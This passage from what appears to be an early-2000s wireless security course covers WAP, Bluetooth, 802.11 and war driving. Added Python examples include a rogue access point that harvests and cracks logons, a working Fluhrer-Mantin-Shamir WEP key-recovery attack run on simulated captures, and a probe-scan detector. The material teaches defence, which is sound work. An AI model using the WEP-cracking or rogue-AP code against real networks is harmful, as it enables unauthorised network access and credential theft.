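        return {"ap_nonce": self.ap_nonce,
                "ap_proof": auth_tag(self.password, b"ap", client_nonce, self.ap_nonce)}

    def finish(self, msg):
        if "password" in msg:                       # design 1: password in the clear
            return "AUTH-OK" if msg["password"] == self.password else "AUTH-FAIL"
        expected = auth_tag(self.password, b"client", msg.get("client_nonce", b""), self.ap_nonce)
        return "AUTH-OK" if hmac.compare_digest(msg["client_proof"], expected) else "AUTH-FAIL"


class RogueAP:
    """Advertises the victim's SSID at higher power, knows no password, records everything,
    and answers every logon with a failure the user will put down to flaky wireless."""
    def __init__(self):
        self.harvested = []

    def start(self, client_nonce=b""):
        self.ap_nonce = os.urandom(16)
        return {"ap_nonce": self.ap_nonce, "ap_proof": os.urandom(32)}  # cannot compute a real proof

    def finish(self, msg):
        self.harvested.append(msg)
        return "AUTH-FAIL"


def client_plaintext(ap, password):
    """Design 1: the client sends the password itself (e.g. a web logon form over the WLAN)."""
    ap.start()
    return ap.finish({"password": password})


def client_one_way(ap, password):
    """Design 2: the client proves knowledge of the password; the AP proves nothing."""
    ap_nonce = ap.start()["ap_nonce"]
    return ap.finish({"client_proof": auth_tag(password, b"client", b"", ap_nonce)})


def client_mutual(ap, password):
    """Design 3: the client challenges first and reveals nothing until the AP proves itself."""
    client_nonce = os.urandom(16)
    reply = ap.start(client_nonce)
    if not hmac.compare_digest(reply["ap_proof"],
                               auth_tag(password, b"ap", client_nonce, reply["ap_nonce"])):
        return "CLIENT-ABORT"                       # rogue detected before any proof is sent
    proof = auth_tag(password, b"client", client_nonce, reply["ap_nonce"])
    return ap.finish({"client_nonce": client_nonce, "client_proof": proof})


def rogue_offline_attack(rogue):
    """Password the attacker ends up with: read directly, or cracked from a captured
    challenge/response by trying the wordlist.  None if nothing usable was harvested."""
    for msg in rogue.harvested:
        if "password" in msg:
            return msg["password"]
        for guess in WORDLIST:
            tag = auth_tag(guess, b"client", msg.get("client_nonce", b""), rogue.ap_nonce)
            if hmac.compare_digest(tag, msg["client_proof"]):
                return guess
    return None


def run_against_rogue(client):
    """Returns (what the client saw, what the attacker learned) for one client design."""
    rogue = RogueAP()
    return client(rogue, NETWORK_PASSWORD), rogue_offline_attack(rogue)


if __name__ == "__main__":
    for client in (client_plaintext, client_one_way, client_mutual):
        seen, learned = run_against_rogue(client)
        print(f"{client.__name__:17} client saw {seen:13} attacker learned {learned!r}")
```

Even the mutual design is only as strong as the password behind it: a passive eavesdropper on a legitimate exchange still captures a challenge and a response that can be fed to the same offline wordlist attack. That is why the slide recommends strong, public-key based mechanisms rather than merely a better password protocol.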

                           Wireless Protocols

           • WAP
           • Bluetooth
           • 802.11


Now let us move on to a discussion of a few popular wireless protocols. We will provide an
overview of how each protocol works and then describe a few attacks that can be levied against the
specific protocol implementation.
We will begin by discussing WAP and Bluetooth, which are two protocols often used by handheld
wireless devices. WAP is especially well suited to small, low-computation devices such as cellular
phones. Bluetooth provides a low cost, low power solution that is very widely supported, allowing
diverse types of wireless devices to communicate seamlessly.
802.11, the third protocol we will discuss, is the most popular communications standard used in
wireless LAN environments.

         Wireless Application Protocol (WAP)

         • The WAP Forum has now formally approved WAP
         Specification v. 2.0.
         • Operates over a multitude of different wireless
         technologies: Cellular Digital Packet Data (CDPD), Code
          Division Multiple Access (CDMA) and Global System for Mobile Communications (GSM)
         • Enables a multitude of wireless devices, including cellular
         phones and PDAs, to have a common way to access the
         • Built in security at the transport layer similar to SSL


WAP is a protocol designed specifically to allow reduced-capability mobile devices to access the
Internet in a standardized way. Mobile devices such as cell phones and PDAs have limited display
capabilities and simple user interfaces. They further have limited processing power, battery life and
storage capabilities, and their ability to stay connected to the network is inherently unreliable. The
WAP protocol is designed to address these issues and enable sophisticated data delivery to mobile

From the July 2001 WAP Architecture Specification (see http://www.wapforum.org/):
The Wireless Application Protocol (WAP) is a result of continuous work to define an industry wide
specification for developing applications that operate over wireless communication networks. WAP
selects and defines a set of open, extensible protocols and content formats as a basis for interoperable
implementations. The WAP Forum's objectives are:
         •To bring Internet content and advanced data services to digital cellular phones and other
         wireless terminals.
         •To create a global wireless protocol specification that will work across differing wireless
         network technologies.
         •To enable the creation of content and applications that scale across a very wide range of
         bearer networks and device types.
WAP 2.0 provides support for standard Internet protocols such as IP, TCP, and HTTP, optimized
for the wireless telecommunications environment.

WAP provides a built in security mechanism at the transport layer that is based on the industry
standard TLS, the standardized successor of SSL. The mechanism allows a wireless client to establish
an end-to-end secure connection with an Internet server. Further, security has been enhanced in the
new 2.0 version of WAP, solving a few security problems present in the earlier specifications.
More information: http://news.zdnet.co.uk/story/0,,t298-s2092470,00.html

                                The "WAP Gap"

                           WTLS                                TLS/SSL

                                        WAP Gateway                       Internet server

            • WTLS: Wireless Transport Layer Security
            • Used in versions prior to WAP 2.0
            • Requires the WAP gateway to decrypt WTLS
              transmissions and then re-encrypt as TLS/SSL
            • Sensitive data is exposed as it traverses the gateway

Before WAP 2.0 became available in late 2001, WAP users had to rely on the WTLS (Wireless
Transport Layer Security) protocol to provide a secure connection between wireless clients and
Internet web servers. Besides the fact that WTLS suffered from a few problems with its encryption
(see link below), security professionals were worried about the so-called "WAP gap" illustrated in
the slide above.
The WAP gap problem arises because the mechanism used to encrypt data on the airwaves is
different from the encryption understood by Internet servers. Thus, a point of translation is needed --
in this case the WAP gateway. The gateway's job is to decrypt the WTLS transmissions, and then re-
encrypt them via TLS/SSL. The problem is that sensitive information is then in the clear in the WAP
gateway's memory for a short time. If an attacker were able to take control of the gateway system, he
would be able to access all of the "secure" communications traversing the network juncture. Worse,
the WAP gateway is usually controlled by the wireless carrier, meaning that the end user can gain no
knowledge regarding the security in place at the gateway. The system requires that the client
implicitly trust that the WAP gateway is secure.
The WAP Forum's solution to the problem comes with the WAP 2.0 specification. The new spec
discards WTLS in favor of true TLS. The change means that the gateway no longer needs to act as a
translator, since Internet servers are able to interpret the TLS transmissions directly. All data remains
encrypted as it passes through the gateway. While this is good news, experts believe that it will take
some time before WAP 2.0 is widely deployed, as the new standard is significantly different from the
old one.

IBM takes a look at WAP 2.0 security in the paper linked below. The discussion includes detailed
information about how WTLS differs from TLS.

Markku-Juhani Saarinen has written a paper describing several attacks against the WAP WTLS
protocol: http://www.freeprotocols.org/harmOfWap/wtls.pdf.

         Protecting WTLS WAP Gateways

    •    Ensure that the WAP gateway never stores decrypted
         content on secondary media
    •    Implement additional security at the higher layers
    •    Secure the WAP gateway physically so that only
         administrators have access to the system console
    •    Limit administrative access to the WAP gateway so that it is
         not available to any remote site outside the firewall
    •    Disconnect WAP applications from the rest of the network
    •    Add WAP devices to your PKI infrastructure

If your organization is not ready to make the jump to the new WAP 2.0 specification, the
requirement for protecting the WAP gateway from compromise becomes extremely important. The
slide above gives some suggestions for protecting the gateway (assuming it is under your control to
begin with). These suggestions are discussed in greater detail in the news article linked below.

                                   Bluetooth
            • Operates in the 2.4 GHz ISM frequency band
            • Supports a range of about 30 ft (10 m)
            • Maximum Bandwidth is 1 Mb/s
            • Devices don’t need to be “line of sight”
            • Supports data, voice, and content-centric applications
            • Uses FHSS at up to 1600 hops/second
            • Signal hops among 79 frequencies at 1 MHz intervals for a high
            degree of interference immunity
            • Up to seven simultaneous connections can be established and


We begin our discussion of the Bluetooth protocol with a description given in a recent report:
"Bluetooth's primary strength is that it can be used to allow almost any wireless device to talk to any
other wireless device. For example, Bluetooth can work as a lower speed wireless network at a speed
that most users will find acceptable. It can also connect up to access points in hotels and in the home.
On the move it can connect to mobile phones. It can synchronize with palm format devices. In short
it can be used wherever you are - home, office, or on the move. It may not do any one solution as
well as a dedicated offering, but its overall ubiquity makes it enormously powerful. Bluetooth is also
designed to be cheap."
Reference: http://www.cellular.co.za/technologies/bluetooth/bluetooth_versus_802.htm

From the description we see that Bluetooth allows a wide range of wireless devices to interoperate.
Indeed the special interest group (SIG) driving the Bluetooth standards includes several industry
leaders such as 3Com, Agere, Ericsson, IBM, Intel, Lucent, Microsoft, Motorola, Nokia and Toshiba
along with a few thousand other companies. Microsoft has announced that Bluetooth will be
embedded in future versions of Windows and Pocket PCs. Some experts predict that Bluetooth will
eventually displace 802.11 due to its flexibility, but others disagree, citing Bluetooth's lesser
bandwidth and range.

Specifications for the Bluetooth protocol standard are available for public download at the link
below, but be prepared to do some reading -- the spec is over 1000 pages long!

A "Bluetooth Primer" is here: http://www.mcommercetimes.com/Technology/37
Find even more information at: http://www.bluetooth.com

                            Bluetooth Security
       • Each Bluetooth device stores the following:
            - 48-bit unique device address
            - 128-bit unique unit key
       • Each connection has a link key associated with it
       • The link key value is chosen during connection
       setup for two devices who have not previously
       communicated (otherwise it can be used for auth)
       • A device's unit key can be used as the link key
       • The link key is used to generate the encryption key

For all of its wonderful flexibility, the Bluetooth protocol has some security issues.
 According to the Bluetooth primer previously referenced, analysts have compared the Bluetooth
security situation to posting a social security number to a chat room. Researchers from Lucent's Bell
Labs discovered that conversations protected by Bluetooth encryption could be easily deciphered. A
researcher from the Helsinki University of Technology performed in-depth research on the topic and
concluded: "Bluetooth is adequate for small applications, but any sensitive data should not be sent
with Bluetooth."
So what's the problem? Basically, all of Bluetooth's security relies on the secrecy of the "link key"
that is chosen when the first connection between two devices is negotiated. The link key is used to
generate the encryption key that protects the data, and can be used for authentication if the two
devices communicate again at a later time. So how is the link key chosen? There are actually several
ways. The simplest and most insecure method is to use the unit key of one of the two devices as the
link key, and this is often done in practice, especially with devices that have limited
computational and storage capabilities. The problem arises because the unit key is effectively
permanent, and it is now shared with every device that has ever paired with that unit. If you and I
communicate using my unit key, and then I communicate with someone else using my unit key, you would
be able to decrypt my communications with the other person, or impersonate me to them.
Additional Bluetooth security problems are discussed on the next page.

The article linked below provides a summary of Bluetooth security issues:

Juha Vainio's paper (research performed at Helsinki University) is here:

                   Bluetooth Security Issues

         • The link key is not really secret, connections can be
         eavesdropped and deciphered
         • The encryption can be broken in some cases
         • A device's address is unique -- by tracking a particular
         address a person's activities can be tracked
         • A 4-digit PIN code must be entered manually each time the
         device is used -- can be a hassle ....
         • To avoid the hassle, PINs can be stored in the device’s
         memory or hard drive => security vulnerability


This slide highlights some of the other security issues with Bluetooth.
First, according to Vainio, the Bluetooth encryption scheme has some weaknesses and can be broken.
Second, the unique device identifiers can lead to an invasion of privacy. Quoting the
mcommercetimes article linked on the previous page:
"Each Bluetooth device has a unique address, allowing users to have some trust in the person at the
other end of the transmission. However, once this ID is associated with a person, by tracking the
unscrambled address sent with each message, individuals can be traced and their activities easily
Third, Bluetooth devices require that the user enter a four-digit PIN each time the device is
used. While this sounds like a good idea, there are unfortunately a few issues with the implementation.
It turns out that many people use weak PINs such as "0000". Clearly this is easily guessed,
but worse, Bluetooth uses the PIN to generate the "initialization key" that protects the pairing
exchange when two units communicate for the first time. A weak PIN implies a weak initialization
key, which implies a security vulnerability: the whole pairing rests on a secret with only 10,000
possible values.
Further, a user can easily become frustrated with the need to enter the PIN each time he wants to use
the device. In an ad-hoc network configuration, the user must enter the PIN for each and every
device he wants to communicate with. Clearly this requirement can quickly become cumbersome.
The solution? Bluetooth devices allow the user to store the PIN in the unit's non-volatile memory or
on its hard drive. This relieves the user of having to enter and re-enter the PIN, but also completely
bypasses the reason for using the PIN in the first place. Any attacker who is able to obtain the device
can impersonate the user to whom the device belongs.

Because most of these problems are inherent in the Bluetooth protocol and implementation, there are
few solutions besides implementing the necessary authentication and encryption mechanisms at the
application layer.


                                   802.11
            •   802.11 standard supports 3 physical layers:
                - Infrared
                - Radio Frequency
                    - FHSS-Frequency Hopping Spread Spectrum
                    - DSSS-Direct Sequence Spread Spectrum
           • Branched into 802.11a, 802.11b, and 802.11g
           • 802.11b supports up to 11 Mbps at 2.4 GHz
           • 802.11a supports up to 54 Mbps at 5 GHz
           • 802.11g supports up to 54 Mbps at 2.4 GHz (new)


The www.extremetech.com website provides a good introduction to 802.11. The information below
is reproduced from a few papers found there. 802.11b is almost always the protocol in use on
wireless LANs.

"IEEE 802.11b is the most common and established wireless network protocol in use today, referred
to as the IEEE 802.11b standard. The 802.11b standard defines, among other things, the radio
frequency bandwidth wireless signals can use, throughput rates over that signal, and how wireless
endpoints communicate with one another.
802.11b signals function in the 2.4000 GHz to 2.4835 GHz range, and have a maximum theoretical
throughput of 11 Mbps (though testing suggests that actual throughput is more like 4-6 Mbps) and
can even step down to 5.5 Mbps, 2 Mbps, and 1 Mbps to allow a more robust signal. 802.11b uses
only Direct Sequence Spread Spectrum (DSSS) radio signaling, as opposed to Frequency Hopping
Spread Spectrum (FHSS), which was part of the original 802.11 specifications. DSSS allows for
greater throughput, but is more susceptible to radio signal interference. Interestingly, many DSSS-
based 802.11 products are inter-operable with current 802.11b networks, but only at 802.11's 2 Mbps
or 1 Mbps. Wireless endpoints have a coverage area that depends on antenna strength and the ability
and clarity of the local environment to transmit radio signals -- typically ranging from 75 to 150 feet
for an office environment."

"Tests of products that use the new 802.11a standard shows that 802.11a networks are as much as
five times faster than 802.11b nets, providing an average throughput of 28 Mbps in practice. The
problem with 802.11a is that it is not interoperable with previously deployed 802.11b products due to
the difference in frequency bands."

                   802.11b Access Control

       • Performed according to MAC (Media Access
       Control) address

        • Performed according to SSID (Service Set Identifier)
            • The SSID is an identifier attached to all packets
            crossing the wireless LAN
            • The SSID functions as a password for joining the WLAN
            • SSIDs are usually broadcast by Access Points and
            should not be considered "secret"


Typically access control on wireless 802.11b LANs is performed based on MAC address or SSID.
We have already discussed how MAC addresses can be spoofed and how the SSID is often broadcast
by the access point. Thus, neither of these access control mechanisms should be considered

                        802.11b WEP
                   Wired Equivalent Privacy
         •   Encrypts data with 40- or 104-bit secret keys (marketed as
         64- and 128-bit WEP, counting the 24-bit IV sent in the clear)
        • Automated tools exist to crack WEP encryption
        keys in a matter of hours or days
        • Exploits weakness in RC4 key scheduling algorithm
        • AirSnort needs to gather 100MB - 1GB of data,
        then the key can be computed in less than a second
        • Completely passive attack, difficult to detect


The 802.11 standard provides for a link layer encryption mechanism called WEP for "Wired
Equivalent Privacy". Unfortunately, this RC4-based encryption mechanism was shown to be
effectively useless during the summer of 2001. Scott Fluhrer, Itsik Mantin, and Adi Shamir presented
a paper at the Selected Areas in Cryptography (SAC 2001) workshop which described a method for
recovering the secret key. The method exploits weaknesses in the RC4 key scheduling algorithm: for
certain "weak" IVs the first keystream byte leaks information about one key byte, and WEP both
prepends the IV to the secret key and encrypts a known first plaintext byte (the LLC/SNAP header).
The researchers speculated that the required traffic sample could be passively collected from an
active target wireless network in a few hours.
Soon after, a research team from AT&T Labs and Rice University implemented the cracking algorithm
and proved that the method works as well in practice as it does in theory. The team used the method
to recover a 128-bit key from a production network. Only a $100 Linksys wireless Ethernet card, Linux
and some tinkering were needed to enable the capture of raw WEP encrypted packets. After that,
collecting enough traffic and recovering the secret key took only a few hours with a laptop. The
exploit code itself was written in under two hours.
According to the AT&T paper: "Even with the hardware and software problems we ran into, from the
time that we first decided to look at this problem, it took less than a week for the card to be ordered
and shipped, the test-bed to be set up, the problems to be debugged, and a full key to be recovered."
Note that increasing the length of the secret key does not provide any greater security. The Fluhrer
et al. paper states that the method can be used to recover an arbitrarily long key in a negligible
amount of time that grows only linearly with key size, since each additional key byte needs only
another set of weak IVs.

News articles:
The AT&T Labs Report: http://www.cs.rice.edu/~astubble/wep/
Fluhrer, Mantin, and Shamir's paper: http://www.crypto.com/papers/others/rc4_ksaproc.ps or

                                  Cracking WEP

      • Several tools are freely available to crack
        WEP encryption automatically
      • AirSnort: http://airsnort.sourceforge.net/
      • WEPCrack:
      • Completely passive attack
      • Typically only takes a few hours to recover
        encryption keys from a busy network

The first exploit tools to automatically recover encryption keys from WEP-protected 802.11 wireless
networks have already been released. These tools work by exploiting the recently publicized
weaknesses in the RC4 key scheduling algorithm. One tool, called AirSnort, passively monitors
network traffic and computes the WEP encryption key once enough packets have been gathered.
Reports indicate that AirSnort typically needs between 100 MB and 1 GB of captured data to work
with, but given that, the encryption key can be calculated in under a second. The tool is written in
C/C++ and runs on Linux.

From the AirSnort FAQ:
To crack a WEP password, AirSnort needs a certain number of packets with weak keys. Out of the
sixteen million keys which can be generated by WEP cards, about three thousand are weak (for 128
bit encryption.) Call these packets with weak keys "interesting." Most passwords can be guessed
after about two thousand interesting packets.
All 802.11b networks with 40/128 bit WEP encryption are vulnerable. As this is a passive attack,
nothing can be done to detect that this is being done, either.

The AirSnort development page at SourceForge can be found here.

A similar tool, called WEPCrack, is also under development.

These are the first publicly available implementations of the attacks theorized by Fluhrer, Mantin,
and Shamir.
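The attack described in the WEP paragraph above, and quantified in the AirSnort FAQ, can be reproduced end to end in a few dozen lines. The "interesting" packets are those whose IV has the form (A+3, 255, X): 256 of them per secret key byte, so 13 x 256 (about 3,300) of the 16 million IVs for a 104-bit key, matching the FAQ's "about three thousand". The following is an added example written for this edition, not code from the page, from AirSnort or from the Fluhrer, Mantin and Shamir paper: it simulates a 40-bit WEP network, captures the first ciphertext byte of one frame per weak IV, and recovers the key byte by byte. It assumes the first plaintext byte of every frame is the LLC/SNAP byte 0xAA, which holds for 802.11 data frames and is what the real attack relies on; the key, the captured traffic and all function names are constructed.

```python
"""Added example: the Fluhrer-Mantin-Shamir (FMS) attack on WEP, run against a simulated
40-bit WEP network.  Plain RC4 plus two WEP facts: the 3-byte IV is prepended to the
secret key, and every data frame's first plaintext byte is the LLC/SNAP byte 0xAA."""
import os
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # known plaintext: first byte of the LLC/SNAP header of 802.11 data frames


def rc4_ksa(key):
    """RC4 key scheduling: build the permutation S from the key bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_keystream_byte(key):
    """First PRGA output byte (i = 1, j = S[1], swap, output S[S[1] + S[j]])."""
    S = rc4_ksa(key)
    j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) % 256]


def wep_first_ciphertext_byte(iv, secret_key):
    """WEP per-frame key is IV || secret key; the IV is sent in the clear with the frame."""
    return SNAP_FIRST_BYTE ^ rc4_first_keystream_byte(list(iv) + list(secret_key))


def simulate_capture(secret_key):
    """Constructed capture: (iv, first ciphertext byte) for one frame per weak IV
    (A+3, 255, X), i.e. the 'interesting' packets a sniffer keeps; 256 per key byte."""
    return [((a + 3, 255, x), wep_first_ciphertext_byte((a + 3, 255, x), secret_key))
            for a in range(len(secret_key)) for x in range(256)]


def fms_votes(packets, known_prefix):
    """Votes for secret key byte A = len(known_prefix).  The attacker knows the IV and the
    first A secret bytes, so it can replay the first A+3 KSA steps exactly.  If the state is
    'resolved' (S[1] + S[S[1]] == A+3), then with ~5% probability the first keystream
    byte equals the value swapped into S[A+3] at step A+3, which pins down K[A+3]."""
    a = len(known_prefix)
    votes = Counter()
    for iv, c0 in packets:
        z = c0 ^ SNAP_FIRST_BYTE                   # first keystream byte, from known plaintext
        key = list(iv) + list(known_prefix)
        S, j = list(range(256)), 0
        for i in range(a + 3):
            j = (j + S[i] + key[i]) % 256
            S[i], S[j] = S[j], S[i]
        s1 = S[1]
        if s1 >= a + 3 or s1 + S[s1] != a + 3:
            continue                               # not resolved: this IV says nothing about byte A
        # Step A+3 computes j' = j + S[A+3] + K[A+3] and swaps S[A+3] <-> S[j'].  If the
        # relevant cells survive the remaining steps, z == old S[j'], so j' = S.index(z).
        votes[(S.index(z) - j - S[a + 3]) % 256] += 1
    return votes


def recover_key(packets, key_len, top=5):
    """Depth-first search over the `top` best-voted candidates for each byte; a full key is
    accepted only if it reproduces the ciphertext of a few captured frames."""
    sample = packets[::max(1, len(packets) // 4)][:4]

    def search(prefix):
        if len(prefix) == key_len:
            ok = all(wep_first_ciphertext_byte(iv, prefix) == c0 for iv, c0 in sample)
            return bytes(prefix) if ok else None
        for cand, _ in fms_votes(packets, prefix).most_common(top):
            found = search(prefix + [cand])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    secret = os.urandom(5)                         # constructed 40-bit WEP key
    recovered = recover_key(simulate_capture(secret), len(secret))
    print("secret key:", secret.hex(), " recovered:", recovered.hex() if recovered else "failed")
```

Each resolved IV leaks the next key byte with only about a 5% probability, which is why the attacker votes rather than trusting one packet and why AirSnort needs on the order of sixty or more interesting packets per key byte; the depth-first fallback over the best few candidates covers the occasional byte whose true value is outvoted. The work grows linearly with key length, as Fluhrer et al. state, because each additional key byte needs only another 256 weak IVs, not another factor of 256 in effort.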

                             802.11b Security
       • SSIDs are often broadcast by Access Points or given out
       upon receiving an anonymous request
       • SSIDs can be easily sniffed
       • Any machine that has the correct SSID can join the network
       • WEP encryption easily cracked, tools are available to
       automate the passive recovery of WEP encryption keys
       • MAC addresses can be sniffed; the MACs are sent in clear
       text even with WEP enabled
       • MAC addresses can be spoofed


This slide basically recaps what we have discussed several times in this module:
         • SSIDs are not secure. They are often broadcast by access points in beacon signals. Access
         points will also give out the SSID to anyone who asks unless configured not to do so. Thus,
         you should expect that anyone can discover your network's SSID.
         • WEP encryption raises the bar for attackers wishing to eavesdrop, but not by much. As
         discussed on the previous page, automated tools exist to crack WEP encryption keys in a
         matter of hours.
         • MAC address-based authentication is nice, but not sufficient for access control. Many
         devices allow their MACs to be changed, and thus MAC spoofing is entirely possible.

In general, it is a good idea to use MAC authentication, WEP encryption, and a hard-to-guess SSID
while configuring your access point to keep quiet. However, these methods have all been shown to
be insufficient for securing a network. The protections may deter casual, opportunistic attackers, but
will not present significant obstacles to a determined adversary.

                     How To Protect 802.11
           • Use a strong authentication mechanism
           • Require mutual authentication between
           client and server
           • Utilize end-to-end encryption at the
           higher protocol layers (e.g. SSH and SSL)
           • Configure the AP to keep silent about
           the SSID

Reiterating our 802.11 security requirements:
• Use a strong authentication mechanism. This means something based on cryptographic keys, and
does not mean using a username and password that will traverse the WLAN in clear text.
• Require mutual authentication between client and server. This protects against the two
masquerading attacks previously discussed.
• Utilize end-to-end encryption at the higher protocol layers. This means using a VPN-type
solution instead of relying on 802.11's link layer WEP encryption.
• Configure the AP to keep silent about the SSID. This amounts to disabling the AP's beacon
signal and configuring it to ignore anonymous requests for the SSID. Unfortunately, not all AP
products allow the user to configure the system this way.

                             Wireless Attacks

           • Wireless technology is getting much cheaper
           • Base stations for less than $200, with
             wireless cards under $100
               - IEEE 802.11b standard very popular
               - Employees setting up their own access points so
                 they can roam around the halls
               - Very dangerous!
           • War driving
               - With a laptop and wireless card, an attacker can
                 drive down the street and join many wireless

This slide simply highlights how easy it is for an attacker to wreak havoc on an unsuspecting
wireless LAN. Soon we will see an example of a program called NetStumbler that will bring this
point home.

                 Wireless Misconfigurations

           • Many wireless access points (aka base
             stations) are configured with no security
           • In some installations, SSID used as a
             password is the only security
                - Blank or default SSIDs are common
           • Access points often broadcast the SSID
           • Access points often respond to
             anonymous requests for the SSID

Due to the misconfiguration issues given in the slide (and previously discussed), many WLAN
administrators enable a new attacker technique known as "war driving".
In war driving, an attacker armed with a laptop, RF receiver, and antenna simply drives around town
looking for open wireless networks. Many networks announce their presence via beacon
signals; in other cases the attacker sends out broadcast "pings" that elicit responses from the APs
within range.

The eye-opening article linked below details a "war-driving" excursion made by two BBC journalists
and two "white-hat hackers" in London's financial district. Armed with a laptop sporting a wireless
network card and a GPS handset, the entourage found that two-thirds of the networks they
discovered were completely unprotected. Further, the networks that did attempt to protect their data
did so using only known-crackable wireless encryption technologies.
Any malicious party could easily join these networks and have the same level of access enjoyed by
an internal user. This is a frightening prospect when we realize that London's financial district is
largely populated by investment banks, financial advisors, and regional offices of large corporations.


                       Tools For War Driving

           • Perl Script by Peter Shipley
                - Ties in geography (using GPS) with SSID and signal strength
                - http://lists.bawug.org/pipermail/wireless/2001-
           • Francisco Luis Roque’s Scripts
                - No GPS
                - http://www.blackant.net/other/wireless.php
           • Airopeek
                - Commercial
                - Sniffs data
                - http://www.wildpackets.com/products/airopeek


Many tools are available to aid the would-be war-driver. Our favorite is NetStumbler, described next.

            • http://www.netstumbler.org
            • Runs on Win2000/98/95


NetStumbler sends out a broadcast probe about once a second and reports the responses. The
responses are typically generated by infrastructure access points, which generously supply the names
of their networks as well as their SSIDs. Ad-hoc network clients also sometimes respond. In the ad-hoc
case, NetStumbler attempts to find the names of all locally visible peers.
From the screen shot above, generated in New York City, we see that many wireless LANs
have been discovered, along with their names and SSIDs. It would be trivial for an attacker to
connect to most of these networks and masquerade as a legitimate endpoint. That is, the attacker
would have "internal" access to the other computers connected to the wireless LAN. With "internal
access" the attacker would be free to poke at open shares on Windows machines, sniff passwords,

NetStumbler is freely available from the URL on the slide. Security auditors and attackers alike find
it easy to use. Download it, load it up, and try it out. The results you generate just by driving around
your neighborhood will frighten and amaze you.
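The once-a-second broadcast probe described above is itself something a defender can look for. The following Python is an added example, not anything shipped with NetStumbler or the SANS module: it runs a simple rate check over a constructed capture log (the record format, timestamps and MAC addresses are made up for this example) and flags sources that send null-SSID probe requests at a steady rate of about one per second.

```python
from collections import defaultdict

# Constructed sample of 802.11 management-frame records as a monitor-mode
# capture tool might log them: seconds, source MAC, frame type, SSID.
# An empty SSID means a broadcast (null-SSID) probe request.
# Format and values are made up for this example.
CAPTURE = """\
0.00,00:0a:0b:0c:0d:01,probe-req,
0.40,00:11:22:33:44:55,probe-req,corp-net
1.02,00:0a:0b:0c:0d:01,probe-req,
1.98,00:0a:0b:0c:0d:01,probe-req,
2.10,00:11:22:33:44:55,probe-req,corp-net
3.01,00:0a:0b:0c:0d:01,probe-req,
4.03,00:0a:0b:0c:0d:01,probe-req,
5.00,00:0a:0b:0c:0d:01,probe-req,
"""

def parse(capture):
    """Turn the log text into (timestamp, src_mac, frame_type, ssid) tuples."""
    records = []
    for line in capture.splitlines():
        ts, src, frame, ssid = line.split(",", 3)
        records.append((float(ts), src, frame, ssid))
    return records

def broadcast_probe_stats(records):
    """Per source MAC: (count, mean inter-probe gap) for null-SSID probes only."""
    times = defaultdict(list)
    for ts, src, frame, ssid in records:
        if frame == "probe-req" and ssid == "":
            times[src].append(ts)
    stats = {}
    for src, ts in times.items():
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        mean = sum(gaps) / len(gaps) if gaps else None
        stats[src] = (len(ts), mean)
    return stats

def flag_scanners(records, min_probes=5, period=1.0, tolerance=0.25):
    """MACs sending at least min_probes broadcast probes at roughly one per period."""
    flagged = []
    for src, (count, mean) in broadcast_probe_stats(records).items():
        if count >= min_probes and mean is not None and abs(mean - period) <= tolerance:
            flagged.append(src)
    return sorted(flagged)

if __name__ == "__main__":
    print(flag_scanners(parse(CAPTURE)))   # ['00:0a:0b:0c:0d:01']
```

Probe requests are normal client behaviour, so treat a hit as something to investigate rather than proof of war driving; a monitor-mode capture is needed to see them at all.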

                   Course Revision History


v1.0 – E. Cole – June 2001
v1.1 – edited/formatted by J. Kolde – 8 June 2001
v1.2 – edited by E. Cole – July 2001
v1.3 – edited and audio recorded by C. Wendt – July 13, 2001
v1.3a – edited by J. Kolde – 23 July 2001
v1.4 – edits by E. Cole – 10 Aug 2001
v1.5 – updated by E. Cole – 1 Nov 2001
v1.6 – updated by V. Irwin – 21 Jan 2002
v1.6a – edited by C. Wendt – 25 Jan 2002

